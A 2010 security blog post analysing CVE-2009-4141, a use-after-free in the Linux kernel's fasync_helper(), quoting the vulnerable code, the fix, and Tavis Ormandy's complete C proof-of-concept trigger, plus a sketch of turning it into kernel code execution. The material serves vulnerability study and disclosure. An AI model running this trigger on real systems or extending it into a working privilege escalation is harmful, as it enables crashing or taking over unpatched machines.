xorl %eax, %eax

CVE-2009-4141: Linux kernel FASYNC Locked File Use After Free


I saw this on Tavis Ormandy’s Twitter today. The bug was discovered and disclosed by Tavis Ormandy of Google, and here is the buggy code from the 2.6.32 release of the Linux kernel…

/*
 * fasync_helper() is used by almost all character device drivers
 * to set up the fasync queue. It returns negative on error, 0 if it did
 * no changes and positive if it added/deleted the entry.
 */
int fasync_helper(int fd, struct file * filp, int on, struct fasync_struct **fapp)
{
        struct fasync_struct *fa, **fp;
        struct fasync_struct *new = NULL;
        int result = 0;

        if (on) {
                new = kmem_cache_alloc(fasync_cache, GFP_KERNEL);
                if (!new)
                        return -ENOMEM;
        }

This routine resides in fs/fcntl.c and, as the comment says, it is used to set up the fasync queue. In the above snippet you can see that if ‘on’ is set, it calls kmem_cache_alloc() to allocate a new entry from the fasync_cache slab before taking any locks. The function continues like this:

        /*
         * We need to take f_lock first since it's not an IRQ-safe
         * lock.
         */
        spin_lock(&filp->f_lock);
        write_lock_irq(&fasync_lock);
        for (fp = fapp; (fa = *fp) != NULL; fp = &fa->fa_next) {
                if (fa->fa_file == filp) {
                        if(on) {
                                fa->fa_fd = fd;
                                kmem_cache_free(fasync_cache, new);
                        } else {
                                *fp = fa->fa_next;
                                kmem_cache_free(fasync_cache, fa);
                                result = 1;
                        }
                        goto out;
                }
        }

Here the code takes the file’s f_lock spinlock and then the global fasync_lock (in that order, as the comment explains) and enters the main ‘for’ loop, which walks the singly linked fasync queue. If it finds an entry whose fa_file matches the ‘filp’ argument, then when ‘on’ is set it updates that entry’s file descriptor and frees the newly allocated, now unneeded, entry with kmem_cache_free(); when ‘on’ is clear it unlinks the matching entry from the list and frees it with kmem_cache_free(). Either way it jumps to ‘out’.
Next, fasync_helper() will execute this:

        if (on) {
                new->magic = FASYNC_MAGIC;
                new->fa_file = filp;
                new->fa_fd = fd;
                new->fa_next = *fapp;
                *fapp = new;
                result = 1;
        }

If no entry for this file was found and ‘on’ is set, the new entry is initialized with these values and pushed onto the head of the queue. Nothing really special here. Finally, the routine reaches this code:

out:
        if (on)
                filp->f_flags |= FASYNC;
        else
                filp->f_flags &= ~FASYNC;
        write_unlock_irq(&fasync_lock);
        spin_unlock(&filp->f_lock);
        return result;
}

At ‘out’, the FASYNC flag is set on the file if ‘on’ was set and cleared otherwise. Note that this happens regardless of whether an entry was actually found, added or removed. Finally, the two locks are released and the value of ‘result’ is returned.
Tavis Ormandy noticed that a file which is both locked and has the FASYNC flag set can be referenced even after it has been freed. The bug is a design flaw: fasync_helper() sets or clears FASYNC based only on its ‘on’ argument, whether or not it actually found or added an entry on the list it was given. The code implicitly assumes that a file only ever appears on the one ‘fasync’ list passed to it. However, file locks carry a second fasync list of their own, in the file_lock structure defined in include/linux/fs.h:

struct file_lock {
        struct file_lock *fl_next;      /* singly linked list for this inode  */
        struct list_head fl_link;       /* doubly linked list of all locks */
     ...
        struct fasync_struct *  fl_fasync; /* for lease break notifications */
        unsigned long fl_break_time;    /* for nonblocking lease breaks */
     ...
};

As you can see, struct file_lock has its own ‘fasync_struct’ list, fl_fasync, used for lease break notifications as the comment states. When a lock is deleted, the locking code calls fasync_helper() with ‘on’ set to 0 on that fl_fasync list. For a plain flock(2) lock the list is empty, so nothing is removed, but fasync_helper() still clears FASYNC on the file. During close, the file’s locks are removed before the kernel checks FASYNC to decide whether to call the driver’s ->fasync() method, which is what drops the file from the driver’s own fasync queue. Since the flag is already clear, that cleanup is skipped: the struct file is freed, but the driver’s queue still holds a ‘fasync_struct’ whose fa_file points to it.
When the driver later walks its queue to deliver SIGIO, the kernel dereferences that stale fa_file pointer and accesses freed memory.
To fix this, fasync_helper() was split into two new static routines, fasync_remove_entry() and fasync_add_entry(), and fasync_helper() itself became a thin wrapper that calls one of them based on its ‘on’ argument. Each routine now changes the FASYNC flag only when it actually removes or adds an entry, so the flag always matches whether the file is on a fasync list. Here is the complete patch:

 /*
- * fasync_helper() is used by almost all character device drivers
- * to set up the fasync queue. It returns negative on error, 0 if it did
- * no changes and positive if it added/deleted the entry.
+ * Remove a fasync entry. If successfully removed, return
+ * positive and clear the FASYNC flag. If no entry exists,
+ * do nothing and return 0.
+ *
+ * NOTE! It is very important that the FASYNC flag always
+ * match the state "is the filp on a fasync list".
+ *
+ * We always take the 'filp->f_lock', in since fasync_lock
+ * needs to be irq-safe.
  */
-int fasync_helper(int fd, struct file * filp, int on, struct fasync_struct **fapp)
+static int fasync_remove_entry(struct file *filp, struct fasync_struct **fapp)
 {
        struct fasync_struct *fa, **fp;
-       struct fasync_struct *new = NULL;
        int result = 0;
 
-       if (on) {
-               new = kmem_cache_alloc(fasync_cache, GFP_KERNEL);
-               if (!new)
-                       return -ENOMEM;
+       spin_lock(&filp->f_lock);
+       write_lock_irq(&fasync_lock);
+       for (fp = fapp; (fa = *fp) != NULL; fp = &fa->fa_next) {
+               if (fa->fa_file != filp)
+                       continue;
+               *fp = fa->fa_next;
+               kmem_cache_free(fasync_cache, fa);
+               filp->f_flags &= ~FASYNC;
+               result = 1;
+               break;
        }
+       write_unlock_irq(&fasync_lock);
+       spin_unlock(&filp->f_lock);
+       return result;
+}
+
+/*
+ * Add a fasync entry. Return negative on error, positive if
+ * added, and zero if did nothing but change an existing one.
+ *
+ * NOTE! It is very important that the FASYNC flag always
+ * match the state "is the filp on a fasync list".
+ */
+static int fasync_add_entry(int fd, struct file *filp, struct fasync_struct **fapp)
+{
+       struct fasync_struct *new, *fa, **fp;
+       int result = 0;
+
+       new = kmem_cache_alloc(fasync_cache, GFP_KERNEL);
+       if (!new)
+               return -ENOMEM;
 
-       /*
-        * We need to take f_lock first since it's not an IRQ-safe
-        * lock.
-        */
        spin_lock(&filp->f_lock);
        write_lock_irq(&fasync_lock);
        for (fp = fapp; (fa = *fp) != NULL; fp = &fa->fa_next) {
-               if (fa->fa_file == filp) {
-                       if(on) {
-                               fa->fa_fd = fd;
-                               kmem_cache_free(fasync_cache, new);
-                       } else {
-                               *fp = fa->fa_next;
-                               kmem_cache_free(fasync_cache, fa);
-                               result = 1;
-                       }
-                       goto out;
-               }
+               if (fa->fa_file != filp)
+                       continue;
+               fa->fa_fd = fd;
+               kmem_cache_free(fasync_cache, new);
+               goto out;
        }
 
-       if (on) {
-               new->magic = FASYNC_MAGIC;
-               new->fa_file = filp;
-               new->fa_fd = fd;
-               new->fa_next = *fapp;
-               *fapp = new;
-               result = 1;
-       }
+       new->magic = FASYNC_MAGIC;
+       new->fa_file = filp;
+       new->fa_fd = fd;
+       new->fa_next = *fapp;
+       *fapp = new;
+       result = 1;
+       filp->f_flags |= FASYNC;
+
 out:
-       if (on)
-               filp->f_flags |= FASYNC;
-       else
-               filp->f_flags &= ~FASYNC;
        write_unlock_irq(&fasync_lock);
        spin_unlock(&filp->f_lock);
        return result;
 }
 
+/*
+ * fasync_helper() is used by almost all character device drivers
+ * to set up the fasync queue, and for regular files by the file
+ * lease code. It returns negative on error, 0 if it did no changes
+ * and positive if it added/deleted the entry.
+ */
+int fasync_helper(int fd, struct file * filp, int on, struct fasync_struct **fapp)
+{
+       if (!on)
+               return fasync_remove_entry(filp, fapp);
+       return fasync_add_entry(fd, filp, fapp);
+}
+
 EXPORT_SYMBOL(fasync_helper);

In addition, Tavis Ormandy provided a PoC trigger (create_elf_tables.c). Let’s have a look at it too…

#ifndef _GNU_SOURCE
# define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdint.h>
#include <stdbool.h>
#include <fcntl.h>
#include <stdlib.h>
#include <assert.h>
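#include <asm/ioctls.h>
#include <sys/file.h>   // flock()
#include <sys/ioctl.h>  // ioctl()
#include <sys/wait.h>   // waitpid()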

// Testcase for locked async fd bug -- taviso 16-Dec-2009
int main(int argc, char **argv)
{
    int fd;
    pid_t child;
    unsigned flag = ~0;

Nothing notable here…

    fd = open("/dev/urandom", O_RDONLY);

    // set up exclusive lock, but dont block
    flock(fd, LOCK_EX | LOCK_NB);

    // set ASYNC flag on descriptor
    ioctl(fd, FIOASYNC, &flag);

    close(fd);

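This is the most important part. It opens /dev/urandom, takes an exclusive flock(2) lock on it (LOCK_NB only means the call fails instead of blocking if the lock is already held), and then uses the FIOASYNC ioctl(2) request to set the ASYNC flag on the descriptor, which adds the file to the random driver’s fasync queue. Finally, it closes the descriptor. On a vulnerable kernel, deleting the flock lock during close calls fasync_helper() with ‘on’ set to 0 on the lock’s empty fl_fasync list, which clears FASYNC anyway; the close path then skips the driver’s fasync cleanup, and the random driver’s queue is left with an entry pointing to the freed struct file.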
In order to trigger the bug Tavis Ormandy does the following:

    // now exec some stuff to populate the AT_RANDOM entries.

    // This assumes /bin/true is an elf executable, and that this kernel
    // supports AT_RANDOM.
    do switch (child = fork()) {
            case  0: execl("/bin/true", "/bin/true", NULL);
                     abort();
            case -1: fprintf(stderr, "fork() failed, %m\n");
                     break;
            default: fprintf(stderr, ".");
                     break;
    } while (waitpid(child, NULL, 0) != -1);

    fprintf(stderr, "waitpid() failed, %m\n");
    return 1;
}

It then keeps forking and executing ‘/bin/true’. On kernels that support AT_RANDOM (added in 2.6.29), the ELF loader fills that auxiliary vector entry with 16 random bytes obtained through get_random_bytes() on every exec, so the loop keeps drawing from the kernel’s entropy pools, the same ones backing /dev/urandom. The PoC relies on this activity eventually making the random driver notify its async users by calling kill_fasync() on its fasync queue, which still holds the stale entry. This is the function:

void kill_fasync(struct fasync_struct **fp, int sig, int band)
{
        /* First a quick test without locking: usually
         * the list is empty.
         */
        if (*fp) {
                read_lock(&fasync_lock);
                /* reread *fp after obtaining the lock */
                __kill_fasync(*fp, sig, band);
                read_unlock(&fasync_lock);
        }
}

kill_fasync() passes the head of the queue to __kill_fasync(), which is also part of fs/fcntl.c:

void __kill_fasync(struct fasync_struct *fa, int sig, int band)
{
        while (fa) {
                struct fown_struct * fown;
                if (fa->magic != FASYNC_MAGIC) {
                        printk(KERN_ERR "kill_fasync: bad magic number in "
                               "fasync_struct!\n");
                        return;
                }
                fown = &fa->fa_file->f_owner;
                /* Don't send SIGURG to processes which have not set a
                   queued signum: SIGURG has its own default signalling
                   mechanism. */
                if (!(sig == SIGURG && fown->signum == 0))
                        send_sigio(fown, fa->fa_fd, band);
                fa = fa->fa_next;
        }
}

As you can read, ‘fown’ is set to &fa->fa_file->f_owner, the f_owner field embedded in the struct file that the entry refers to. The fasync_struct itself is still valid, so the magic check passes, but the struct file it points to has been freed, so ‘fown’ points into freed memory and that is what gets passed to send_sigio() as its first argument. The latter routine performs various operations on this location, as you can see here:

void send_sigio(struct fown_struct *fown, int fd, int band)
{
        struct task_struct *p;
        enum pid_type type;
        struct pid *pid;
        int group = 1;
        
        read_lock(&fown->lock);

        type = fown->pid_type;
        if (type == PIDTYPE_MAX) {
                group = 0;
                type = PIDTYPE_PID;
        }

        pid = fown->pid;
        if (!pid)
                goto out_unlock_fown;
        
        read_lock(&tasklist_lock);
        do_each_pid_task(pid, type, p) {
                send_sigio_to_task(p, fown, fd, band, group);
        } while_each_pid_task(pid, type, p);
        read_unlock(&tasklist_lock);
out_unlock_fown:
        read_unlock(&fown->lock);
}

This means that if an attacker is able to place controlled data in the freed struct file, and thus a malicious ‘fown_struct’ at the f_owner offset, he could control the lock, pid_type and pid values that send_sigio() operates on, and possibly leverage that to execute code in the kernel’s context.

Written by xorl

January 14, 2010 at 20:26

Posted in bugs, linux

One Response


  1. Wow, nice write-up. Thanks!

    Bryan Jacobson

    March 1, 2010 at 15:21

